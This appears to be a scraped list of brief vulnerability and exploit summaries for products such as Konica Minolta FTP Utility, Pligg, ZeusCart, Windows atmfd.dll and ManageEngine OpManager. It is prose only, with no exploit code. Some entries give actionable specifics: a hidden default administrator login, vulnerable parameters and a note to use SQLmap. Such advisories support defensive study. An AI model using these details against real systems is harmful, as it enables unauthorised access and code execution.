Konica Minolta FTP Utility v1.0 is vulnerable to a buffer overflow attack. An attacker can send a maliciously crafted MKD command with a large amount of data to the FTP server, which can cause a buffer overflow and allow the attacker to execute arbitrary code on the vulnerable system.
A vulnerability exists in Thomson CableHome Gateway DWG849 Cable Modem Gateway product specifications which allows local/remote network users to discover user interface credentials and wireless network key values through simple SNMP requests for the value of these variables. Given the security authentication in SNMPv1 and SNMPv2c do not offer sufficient protection, this increases the risk that the values can be disclosed through SNMP using the default read-only community “private”.
Pligg CMS 2.0.2 is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'sql' in the 'load_data_for_search.php' file. This can be done by sending a crafted HTTP request to the vulnerable parameter. An attacker can use SQLmap to exploit this vulnerability.
A buffer overflow vulnerability exists in the ARM-based version of the software, which allows an attacker to execute arbitrary code by overflowing a buffer with malicious data. The vulnerability is triggered when a specially crafted input is sent to the vulnerable application. The attacker can then execute arbitrary code on the target system.
There are at least two SQL Injections in ZeusCart 4.0, one being a blind injection which does not require credentials to be exploited, the other being a standard injection in the admin area. Because the prevention of SQL Injection depends to a large part on applying simple filters on most input instead of using prepared stamements, it is highly likely that there will be more SQL injection vulnerabilities that are not covered here. There is a blind timing based SQL injection into the maincatid argument. An attacker does not need to be authenticated to exploit this.
None of the forms of Zeuscart have CSRF protection, which means that an attacker can perform actions for the victim if the victim visits an attacker controlled site while logged in.
This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing a malformed font. The vulnerability was exploited by the hacking team and disclosed on the july data leak. This module has been tested successfully on vulnerable builds of Windows 8.1 x64.
This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account 'IntegrationUser' with administrator privileges exists. The account has a default password of 'plugin' which can not be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
IKEView.exe R60 localSEH Exploit is a local exploit which is used to execute arbitrary code on the vulnerable system. The exploit was discovered by hyp3rlinx and was tested on Windows XP Professional SP2. The exploit uses a short jump, pop pop ret and a nopsled to execute the payload. The payload contains instructions to execute calc.exe and exit the process.
A memory corruption vulnerability was discovered in Microsoft Office 2007 Excel when the Microsoft Office File Validation Add-In was disabled and Application Verifier was enabled for testing and reproduction. The vulnerability was triggered by a one bit delta from the original file at offset 0x139F. The crashing eip was observed 4 times in fuzzing results with various invalid memory address being dereferenced.
Services By CQR